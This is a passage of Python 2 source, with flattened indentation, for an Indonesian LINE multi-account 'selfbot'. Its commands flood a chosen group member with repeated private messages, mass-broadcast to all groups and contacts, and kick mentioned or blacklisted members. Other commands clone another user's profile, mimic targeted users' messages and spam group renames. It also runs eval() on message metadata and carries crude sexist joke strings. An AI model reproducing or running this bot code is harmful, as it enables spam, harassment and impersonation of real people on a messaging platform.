#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
ki.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Jangan berharap")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
a = k1.getGroupIdsJoined()
a = k2.getGroupIdsJoined()
a = k3.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
k1.sendText(taf, (bctxt))
k2.sendText(taf, (bctxt))
k3.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
#kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot pulang"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
#cl.leaveGroup(i)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
kc.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
#kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
cl.sendText(msg.to,"★(☆─┅═ই╬BABANG_ADHI☆)(2 s★")
ki.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
#kk.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
kc.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
ks.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k1.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k2.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k3.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k4.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k5.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
cl.sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ Team Bonds Kills✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
k1.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
k1.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#----------------------------------------------
elif "copy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Backup","backup"]:
if msg.from_ in admin:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
k1.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish--------------------#
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in admin:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in admin:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
ki.kickoutFromGroup(msg.to,[mention['M']])
else:
cl.sendText(msg.to, "Khusus Admin")
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
#kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
#kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
#kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
random.choice(KAC).sendText(op.param1)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Kenapa left kak")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
#def autolike():
#for zx in range(0,500):
#hasil = cl.activity(limit=500)
#if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
